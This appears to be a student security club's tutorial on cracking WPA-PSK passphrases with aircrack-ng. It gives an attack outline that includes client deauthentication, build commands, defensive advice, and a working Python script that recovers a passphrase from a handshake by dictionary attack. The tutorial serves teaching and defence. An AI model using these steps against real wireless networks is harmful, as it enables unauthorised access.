Cracking WPA
03/24/2010
UTDCSG

What is WPA?
Wi-Fi Protected Access - encryption and authentication for wireless networks.
WEP has design flaws that allow the key to be recovered with near certainty given enough captured traffic (usually 5-15 minutes).
WPA - interim fix for WEP's flaws; still uses RC4 (TKIP).
WPA2 - the finalized standard (IEEE 802.11i); replaces RC4/TKIP with AES-CCMP.
WPA-PSK - a passphrase of 8 to 63 ASCII characters is run through PBKDF2-HMAC-SHA1 for 4096 iterations, with the SSID as the salt, to produce the 256-bit Pairwise Master Key (PMK).

WPA-PSK Weaknesses
WPA-PSK still requires a 4-way handshake to authenticate a wireless client. The handshake never carries the passphrase or the PMK itself, but it carries everything needed to test a guess offline: both MAC addresses, both nonces (ANonce from the AP, SNonce from the client), and a MIC over the EAPOL-Key frame computed with a key (the KCK) that is derived from the PMK. When WPA-PSK is used instead of RADIUS, the PMK is the same for every client and depends only on the passphrase and the SSID. Therefore we can take a candidate passphrase, derive its PMK (hashing it 4096 times with the SSID as salt), derive the PTK/KCK from that PMK using the captured nonces and MAC addresses, recompute the MIC and compare it with the captured MIC: a match tells us our candidate is the passphrase needed to connect to the network. Because the expensive PBKDF2 step depends only on SSID and passphrase, it can be precomputed once per SSID (a pre-hashed word list) and reused against any handshake captured on that SSID; the per-guess PTK and MIC computation is cheap.

Attack Outline
1. Record wireless traffic between client and AP
2. Deauthenticate the client to force a new handshake, or wait for a client to connect and capture the handshake
3. Import a pre-hashed word list for the target SSID (churchofwifi.org) OR import a plain wordlist and compute the PMKs for it while importing
4. Crack the passphrase by checking each candidate PMK against the MIC captured in the handshake

Tools Needed
Aircrack-ng - a set of tools for auditing wireless networks
Airodump-ng --- wireless packet capture tool
Aireplay-ng --- wireless packet injection tool (used for the deauthentication in step 2)
Airolib-ng --- manage and create WPA/WPA2 pre-computed PMK tables
Note: Aircrack-ng must be compiled with SQLite support for airolib-ng to work:
  make sqlite=true
  make sqlite=true install

Compile Aircrack-ng for Ubuntu
Run the following commands in a terminal to build and install Aircrack-ng with SQLite support on Ubuntu. The last two lines are only needed if aircrack-ng was previously installed via aptitude: they point /usr/bin at the freshly built binaries in /usr/local/bin so the packaged versions are not picked up first (use ln -sf if the packaged binaries are still in place, since ln -s will not overwrite an existing file).
  wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
  tar -xzf aircrack-ng-1.0.tar.gz
  cd aircrack-ng-1.0
  make sqlite=true
  make sqlite=true install
  ln -s /usr/local/bin/aircrack-ng /usr/bin/aircrack-ng
  ln -s /usr/local/bin/airolib-ng /usr/bin/airolib-ng

Resources Used
Aircrack - aircrack-ng.org
Pre-hashed 1,000,000 word list for the top 1000 ESSIDs - hak5.org/forums/index.php?showtopic=12708
Slides, Videos, Questions / Comments - utdcsg.org

How to Prevent WPA Cracking
The most reliable defence against WPA-PSK passphrase cracking is to use WPA with a RADIUS server (WPA-Enterprise, 802.1X) instead of WPA-PSK. With RADIUS each client authenticates with its own username and password (or certificate), the PMK is generated per session rather than derived from a shared passphrase, so there is nothing in the captured handshake to run a dictionary against, and accounts can be locked after unsuccessful login attempts.
If WPA-PSK must be used, choose a long (30 or more characters) random passphrase that appears in no wordlist, and change it whenever someone who knew it leaves. Keep in mind that this is an offline attack with no lockout: once the handshake is captured every guess is free, so a weak or commonly used passphrase is only a matter of time on a fast enough computer or a cloud computing network, and a pre-computed table for a default or common SSID makes it faster still.
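The offline check described under WPA-PSK Weaknesses, and steps 3-4 of the Attack Outline, carried out end to end in Python as an added example (this is not code from the slides or from aircrack-ng). The script derives the PMK with PBKDF2-HMAC-SHA1 (the real 802.11i derivation; it reproduces the IEEE 802.11i test vector for passphrase "password" on SSID "IEEE"), expands it to the PTK with PRF-512, recomputes the EAPOL-Key MIC and compares it with the captured one. The "captured" handshake is constructed inside the script from a known passphrase with fixed nonces and made-up MAC addresses and SSID (all assumptions), standing in for a real airodump-ng capture. The PMK table is built per SSID, the same way airolib-ng does it, which is also why a pre-hashed list for one ESSID is useless against another.

```python
"""Offline WPA2-PSK handshake check: PBKDF2 -> PMK, PRF-512 -> PTK/KCK, HMAC-SHA1 -> MIC.
Added example; not code from the UTDCSG slides or from aircrack-ng."""
import hashlib
import hmac

SSID = "utdcsg-demo"                          # constructed network name (assumption)
AP_MAC = bytes.fromhex("001122334455")        # constructed addresses (assumption)
CLIENT_MAC = bytes.fromhex("66778899aabb")
# Byte offset of the 16-byte MIC inside an EAPOL-Key frame:
# 4 (802.1X header) + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8 (fixed key fields) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    The slow, SSID-dependent step; this is what a pre-hashed word list stores."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Everything here except the PMK is visible in the captured handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, first 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 (client -> AP): carries SNonce and the first MIC of the handshake."""
    body = (bytes([0x02])                        # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")        # key info: HMAC-SHA1 version, pairwise, MIC present
            + (0).to_bytes(2, "big")             # key length
            + (1).to_bytes(8, "big")             # replay counter
            + snonce                             # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + mic                                # 16-byte MIC (zero while computing it)
            + (0).to_bytes(2, "big"))            # key data length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def forge_handshake(passphrase, ssid):
    """Stand-in for what airodump-ng would capture from a network using `passphrase`.
    Constructed for the example: nonces are fixed so the run is reproducible."""
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), AP_MAC, CLIENT_MAC, anonce, snonce)
    mic = eapol_mic(ptk[:16], build_eapol_msg2(snonce))   # KCK = first 128 bits of the PTK
    return {"ap_mac": AP_MAC, "client_mac": CLIENT_MAC, "anonce": anonce,
            "snonce": snonce, "eapol": build_eapol_msg2(snonce, mic)}


def precompute_pmks(ssid, wordlist):
    """airolib-ng style table: one PMK per (SSID, passphrase); reusable for any handshake on that SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack(handshake, pmk_table):
    """Step 4 of the attack: derive the KCK from each candidate PMK and compare MICs.
    Returns the matching passphrase, or None if no candidate in the table matches."""
    captured_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for passphrase, pmk in pmk_table.items():
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["client_mac"],
                           handshake["anonce"], handshake["snonce"])
        if eapol_mic(ptk[:16], handshake["eapol"]) == captured_mic:
            return passphrase
    return None


if __name__ == "__main__":
    wordlist = ["password", "letmein1", "wireless", "utdcsg2010", "qwertyuiop"]  # constructed
    hs = forge_handshake("utdcsg2010", SSID)
    table = precompute_pmks(SSID, wordlist)
    print("recovered passphrase:", crack(hs, table))
    print("same words, table built for SSID 'linksys':", crack(hs, precompute_pmks("linksys", wordlist)))
```

The cost split is the point: `precompute_pmks` does 4096 HMAC-SHA1 rounds per word and can be done before a handshake is ever captured, while `crack` does only four HMACs for the PTK plus one for the MIC per candidate. On a real capture the MIC and SNonce come from message 2 (the AP's ANonce from message 1), and for WPA/TKIP networks the MIC is HMAC-MD5 rather than truncated HMAC-SHA1.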